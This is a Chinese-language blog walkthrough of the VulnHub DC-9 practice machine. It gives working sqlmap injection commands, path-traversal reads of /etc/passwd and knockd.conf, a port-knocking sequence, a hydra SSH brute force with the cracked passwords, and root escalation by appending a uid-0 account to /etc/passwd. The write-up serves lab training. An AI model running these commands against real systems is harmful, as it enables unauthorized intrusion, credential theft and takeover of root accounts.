vulnhub DC系列 DC-9

练习两年半的篮球选..哦不对安全选手

已于 2022-12-29 21:44:46 修改

阅读量1.9k

点赞数 1

分类专栏： vulnhub 文章标签：安全 linux php 数据库经验分享

于 2022-12-29 19:31:13 首次发布

本文链接：https://blog.csdn.net/m0_64815693/article/details/128484186

版权

vulnhub 专栏收录该内容

15 篇文章 1 订阅

订阅专栏

总结：sql注入，端口敲门，覆盖passwd提权

下载地址

DC-9.zip (Size: 700 MB)
Download: http://www.five86.com/downloads/DC-9.zip
Download (Mirror): https://download.vulnhub.com/dc/DC-9.zip

使用方法:解压后，使用vm打开ova文件

漏洞分析

信息收集

这里还是使用DC-1的方法

1.给靶机设置一个快照

2.fping -agq 192.168.1.0/24 使用fping快速扫描该网段中存活的机子

3.将靶机关闭重新扫描一下，对比少的那个ip就是靶机的ip

4.使用快照快速将靶机恢复

注：ip段要看自己的

有22端口，但是nmap不确定他是不是开的，这里我们直接去访问这个网站看看。

sql注入

这里在search那里看到一个搜索框，存在sql注入，这里直接使用sqlmap一把嗦

注意这里用的results.php，而不是search.php，我们要拦的包，他响应的。

扫出来这三个information_schema Staff user库，这里肯定是看Staff库了，然后发现了StaffDetails和Users表，这里查看Users表，然后查看 Password 和 Username字段

sqlmap -u "http://192.168.1.10/results.php" --data "search=1" --dbs --batch
sqlmap -u "http://192.168.1.10/results.php" --data "search=1" -D "Staff" --tables --dbs --batch
sqlmap -u "http://192.168.1.10/results.php" --data "search=1" -D "Staff" -T "Users" --columns --dbs --batch
sqlmap -u "http://192.168.1.10/results.php" --data "search=1" -D "Staff" -T "Users" -C "Username","Password" --dump --dbs

这里我们就得到了admin的密码了

admin:transorbital1

在这里我们可以登入

任意文件读取

找了半天没找到有什么提示。。。。去看看别人的才发现这里。。。。。呜呜呜┭┮﹏┭┮

http://靶机ip/welcome.php?file=../../../../../../etc/passwd

这里知道不少用户的账号，而且都是/bin/bash,但是说22端口不知道是有没有开启的，然后吧，咱们又不知道干什么了。看看其他人的，这里我们就知道要去查看linux中的任务。

//查看linux的任务
http://靶机ip/welcome.php?file=../../../../../../proc/sched_debug

这里因为太乱了没有排序，这里教给大家一个好方法，这里直接ctrl+u直接查看源代码，他就会自动给我们排列了。

这里看到了knockd服务，去查看他的配置文件。

http://靶机ip/welcome.php?file=../../../../../../etc/knockd.conf

端口敲门

这里分析一下这个配置文件，在按循序访问了这个三个端口，linux防火墙就不会防我们了，iptables就是linux设置防火墙的命令，这里给大家推荐一个博客，看完也就理解端口敲门是用来看什么的了Web端口敲门的奇思妙想

nmap -sS 靶机ip -p 7469
nmap -sS 靶机ip -p 8475
nmap -sS 靶机ip -p 9842

//这里有一个工具也是可以的，但是感觉很慢
//没有需要自己下，apt install knockd
knock 靶机ip 7469 8475 9842

这里发现原本nmap不确定的22端口开了

ssh爆破

这里将原本passwd中/bin/bash的用户，提前装到user.txt中

echo "marym\njulied\nfredf\nbarneyr\ntomc\njerrym\nwilmaf\nbettyr\nchandlerb\njoeyt\nrachelg\nrossg\nmonicag\nphoebeb\nscoots\njanitor\njanitor2" > user.txt

这里我们使用hydra来爆破，记得设置线程，爆破了挺久

chandlerb:UrAG0D!

janitor:Ilovepeepee

这里ssh连接看看

chandlerb是没有什么东西，这里看看janitor，还好我都会使用ls -al看一遍果然发现了一个隐藏目录里面有一个password密码文件
BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts
把这些放到爆破密码文件重新爆破一下

果然有多爆破出来两个,这里登进去看看

fredf:B4-Tru3-001

joeyt:Passw0rd

提权

经过查看joeyt没有什么东西，关键还是fredf，因为sudo -l发现东西了，但是感觉并不是什么命令之类的，不好提权，经过查看发现这是一个文件，但是里面的内容看不明白，这里查看去参考参考其他人，原来是用来覆盖passwd的呀，这个我熟。

//使用openssl命令
openssl passwd -1 -salt hahaha 123456
生成$1$hahaha$hSxFjZSHRoiEn4DYrrGUI.

//因为没有权限先来到tmp
echo 'hahaha:$1$hahaha$hSxFjZSHRoiEn4DYrrGUI.:0:0::/root/:/bin/bash' >> passwd

//这里使用test
sudo /opt/devstuff/dist/test/test passwd /etc/passwd

//然后替换到hahaha用户，密码123456
su hahaha